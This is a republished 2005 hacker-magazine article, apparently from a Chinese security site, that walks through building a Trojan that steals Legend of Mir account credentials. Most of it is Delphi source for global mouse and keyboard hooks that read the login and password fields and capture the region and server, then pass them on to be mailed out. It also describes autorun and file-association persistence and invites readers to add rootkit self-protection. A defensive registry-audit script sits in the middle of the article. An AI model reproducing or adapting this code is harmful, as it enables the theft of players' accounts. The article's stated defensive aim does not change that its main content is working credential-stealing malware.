Legend of Mir Trojan DIY - vulnerability warning - Black Bar Security Net

ID MYHACK58:6220053714
Type myhack58
Reporter Anonymous
Modified 2005-10-16T00:00:00


Note: this article was published in Hacker Defense, 2005, issue 3; all copyright belongs to it.

Legend of Mir Trojans are a common sight on the network: a server component alone sells for several hundred yuan, and the source code for several thousand yuan or more. Why such a high price? Because a Legend Trojan has to capture the region, server, character equipment and other information, it is not just a simple keylogger; it sometimes also needs memory searching, network packet sniffing and other techniques, so it is somewhat harder to write. That does not mean, however, that the technology behind it is that difficult. Today I will take one apart and explain how a Legend Trojan is written, in the hope that by analysing how its functions are implemented, the game manufacturers can guard against this kind of attack, so that the majority of players really get a clean game space.

The program we write here has the following features. It obtains the Legend game login information (area code, login account, password and server name) and sends it to a specified mailbox. It sets an autorun registry value so that the Trojan server starts with the system and keeps running; if the file association is also set up, it closes itself after obtaining the information and starts again together with the Legend game. With the association set, the Trojan is not running after the machine boots and only starts when the Legend game is run, which improves its stealth.
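The autorun value and the file-association start described above are the two persistence artefacts a defender can audit. As an added example (not part of the original article), the following Python script checks a .reg-style export for an autorun entry launched from a user-writable directory and for an exefile open handler that no longer has the stock value; the key paths and the stock handler value are standard Windows, and the sample export is constructed.

```python
"""Offline audit for the two persistence artefacts the article describes:
an autorun (Run key) entry and a hijacked .exe file association that starts
another program before the game. Reads a .reg-style export, not the live registry."""

# Constructed sample export (assumption: not taken from any real machine).
SAMPLE_REG = r'''
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"ctfmon"="C:\\WINDOWS\\system32\\ctfmon.exe"
"svchost"="C:\\Documents and Settings\\user\\Local Settings\\Temp\\svchost.exe"

[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="C:\\WINDOWS\\system32\\winsrv.exe \"%1\" %*"
'''

RUN_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
EXE_CMD_KEY = r"HKEY_CLASSES_ROOT\exefile\shell\open\command"
STOCK_EXE_CMD = '"%1" %*'  # stock handler; anything else runs a wrapper first
USER_WRITABLE = ("\\temp\\", "\\local settings\\", "\\application data\\")


def parse_reg(text):
    """Parse a minimal .reg export into {key: {value_name: data}}."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and "=" in line:
            name, data = line.split("=", 1)
            name = "(default)" if name == "@" else name.strip('"')
            # undo .reg escaping: \\ becomes \ and \" becomes "
            data = data.strip('"').replace("\\\\", "\\").replace('\\"', '"')
            keys[current][name] = data
    return keys


def audit(keys):
    """Return (key, value_name, reason) tuples for suspicious entries."""
    findings = []
    for name, data in keys.get(RUN_KEY, {}).items():
        if any(marker in data.lower() for marker in USER_WRITABLE):
            findings.append((RUN_KEY, name, "autorun from user-writable path: " + data))
    cmd = keys.get(EXE_CMD_KEY, {}).get("(default)", "")
    if cmd != STOCK_EXE_CMD:
        findings.append((EXE_CMD_KEY, "(default)", "exefile handler replaced: " + cmd))
    return findings


def audit_text(text):
    return audit(parse_reg(text))
```

Run it on a real export with `audit_text(open("export.reg").read())`; the machine in the sample would report the Temp-directory autorun and the replaced exefile handler.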

Once again, a reminder: the main purpose of this article is to lift the veil from the pricier Legend Trojans and to explain the programming method for intercepting the region and server information. It therefore does not add functions for intercepting the character's profession, level or carried equipment, nor does it include driver programming for self-protection or rootkit techniques; friends with the interest and energy can add those themselves. Now let us formally enter the fascinating world of code. The critical code is annotated below; the full code is on the disc.

Main code for obtaining the Legend password, region and server

unit unitHook;

interface
......
function EnableHook: Boolean; stdcall;   //enable the hook procedures
function DisableHook: Boolean; stdcall;  //disable the hook procedures
......

implementation
......

//Callback function for enumerating child windows
function EnumChildWindowsProc(hChild: HWnd): Boolean; stdcall;
var
  szClassName: array[0..255] of char;
begin
  Result := True;  //True means continue with the next child window
  GetClassName(hChild, szClassName, 255);
  if StrPas(szClassName) = 'TEdit' then
  begin
    inc(numEdit);
    if numEdit = 1 then
      hEdit2 := hChild  //password
    else if numEdit = 2 then
      hEdit1 := hChild;  //account
  end;
end;

//Get the password
procedure GetPassword;
var
  ss, ID, PW: string;
begin
  numEdit := 0;  //number of TEdit controls found
  EnumChildWindows(hActiv, @EnumChildWindowsProc, 0);  //enumerate the controls
  if numEdit = 2 then
  begin
    ID := trim(GetCaption(hEdit1));
    PW := trim(GetCaption(hEdit2));
    if (ID <> '') and (PW <> '') then
    begin
      nNext := 3;
      ss := Format('account=%s,password=%s', [ID, PW]) + ' ' + FormatDateTime('yyyy-mm-dd hh:nn:ss', Now);
      StrCopy(@pShMem^.Text, PChar(ss));
      PostMessage(pShMem^.hMainWnd, WM_MOUSEPT, 2, 2);  //notify the main window
    end;
  end;
end;

//Get the server name
procedure GetServerName;
const
  x1 = 310; x2 = 477; y1 = 144;
  d = 3;      //gap between server name buttons
  step = 42;  //vertical step between server name buttons
var
  P: TPoint;
  yy, n1, n2: integer;
  IniFileName, Ident, ss: string;
begin
  GetCursorPos(P);  //current mouse coordinates
  if (P.X < x1) or (P.X > x2) or (P.Y < y1) then exit;  //click is outside the server name area
  yy := P.Y - y1;
  n1 := yy div step;
  n2 := (yy + d) div step;
  if n1 = n2 then inc(n1) else n1 := 0;
  if n1 = 0 then exit;  //click is not on a server name
  IniFileName := ExtractFilePath(ParamStr(0)) + 'ftp.ini';
  Ident := 'server' + IntToStr(n1) + 'caption';
  ss := ReadStringFromIniFile(IniFileName, Ident);
  if ss <> '' then
  begin
    ss := ss + ' ' + FormatDateTime('yyyy-mm-dd hh:nn:ss', Now);
    StrCopy(@pShMem^.Text, PChar('Server=' + ss));
    //PostMessage(pShMem^.hMainWnd, WM_MOUSEPT, 2, 2);  //notification only
    PostMessage(pShMem^.hMainWnd, WM_MOUSEPT, 10, 2);  //notify, and send the collected information
  end;
end;

//Mouse hook procedure: decides from the mouse action whether to write the text file.
//Parameters: iCode is the hook code, wParam the mouse message number, and lParam points to a
//MOUSEHOOKSTRUCT containing information about the mouse event.
function MouseHookPro(iCode: integer; wParam: WPARAM; lParam: LPARAM): LResult; stdcall; export;
var
  hControl: HWND;
  WinClass, WinText, ss: string;
  P: TPoint;
  rcWin: TRect;
begin
  if (iCode = HC_ACTION) and (wParam = WM_LBUTTONUP) then
  begin  //a mouse click message
    hActiv := GetActiveWindow;
    WinClass := GetClass(hActiv);
    if Uppercase(WinClass) = 'TFRMMAIN' then
    begin
      WinText := GetCaption(hActiv);
      if WinText = 'legend client' then
      begin
        hControl := FindWindowEx(hActiv, 0, 'TComboBox', nil);
        if hControl <> 0 then
        begin  //this is the area code selection window
          GetWindowRect(hActiv, rcWin);
          P.X := PMouseHookStruct(lParam)^.pt.X - rcWin.Left;
          P.Y := PMouseHookStruct(lParam)^.pt.Y - rcWin.Top;
          if (P.X >= 200) and (P.X <= 280) and (P.Y >= 348) and (P.Y <= 380) then
          begin  //the "Confirm" button
            ss := 'code=' + GetCaption(hControl) + ' ' + FormatDateTime('yyyy-mm-dd hh:nn:ss', Now);
            StrCopy(@pShMem^.Text, PChar(ss));
            PostMessage(pShMem^.hMainWnd, WM_MOUSEPT, 2, 2);  //notification
          end;
        end;
      end
      else if WinText = 'legend of mir2' then
      begin
        if nNext = 3 then
        begin
          GetServerName;  //get the server name; this block and the one below must not be swapped
          nNext := 0;
        end;
        P := PMouseHookStruct(lParam)^.pt;
        if (P.X >= 421) and (P.X <= 501) and (P.Y >= 336) and (P.Y <= 371) then  //the [Submit] button
          GetPassword;  //get the password; this block and the one above must not be swapped
      end;
    end;
  end;
  Result := CallNextHookEx(mousehook, iCode, wParam, lParam);
end;

//Keyboard hook; wParam is the virtual-key code of the key
function KeyboardHookPro(iCode: Integer; wParam: WPARAM; lParam: LPARAM): LRESULT; stdcall; export;
var
  WinClass, WinText: string;
begin
  if (iCode = HC_ACTION) and ((lParam and $80000000) = 0) and  //$80000000 masks the key-transition bit (0 = key pressed)
     (wParam = $0D) then  //$0D is the Enter key
  begin
    hActiv := GetActiveWindow;
    WinClass := GetClass(hActiv);
    WinText := GetCaption(hActiv);
    if (Uppercase(WinClass) = 'TFRMMAIN') and (WinText = 'legend of mir2') then
      GetPassword;  //get the password
  end;
  Result := CallNextHookEx(keyboardhook, iCode, wParam, lParam);
end;

//Enable the hook procedures
function EnableHook: boolean; stdcall; export;
begin
  if mousehook = 0 then
    mousehook := SetWindowsHookEx(WH_MOUSE, MouseHookPro, HInstance, 0);  //mouse hook
  if keyboardhook = 0 then
    keyboardhook := SetWindowsHookEx(WH_KEYBOARD, KeyboardHookPro, HInstance, 0);  //keyboard hook
  Result := (mousehook <> 0) and (keyboardhook <> 0);
end;

//Disable the hook procedures
function DisableHook: boolean; stdcall; export;
begin
  if mousehook <> 0 then
    if UnHookWindowsHookEx(mousehook) then mousehook := 0;  //mouse hook
  if keyboardhook <> 0 then
    if UnHookWindowsHookEx(keyboardhook) then keyboardhook := 0;  //keyboard hook
  Result := (mousehook = 0) and (keyboardhook = 0);
end;

initialization
  {If the mapping file already exists, open it}
  hMappingFile := OpenFileMapping(FILE_MAP_WRITE, False, MappingFileName);
  if hMappingFile = 0 then
    {Otherwise create the mapping file}
    hMappingFile := CreateFileMapping($FFFFFFFF, nil, PAGE_READWRITE, 0, SizeOf(TShareMem), PChar(MappingFileName));
  if hMappingFile <> 0 then
  begin
    {Point pShMem at the mapped view of the file}
    pShMem := PShareMem(MapViewOfFile(hMappingFile, FILE_MAP_WRITE, 0, 0, 0));
    if pShMem = nil then
    begin
      CloseHandle(hMappingFile);
      MessageBox(0, 'Cannot create shared memory!', '', 0);
      exit;
    end;
  end;
  mousehook := 0;
  keyboardhook := 0;
  nNext := 0;

finalization
  UnMapViewOfFile(pShMem);
  CloseHandle(hMappingFile);

end.


For reasons of space, this article only covers the key code for intercepting the Legend user name, password, region and server information; the code for self-protection, registry modification and the file association is not detailed here. The complete code, with detailed comments, is on the Hacker Defense disc for interested friends to read. I hope the game manufacturers will add anti-Trojan technology so that players no longer suffer from these Trojans, and wish everyone happy gaming.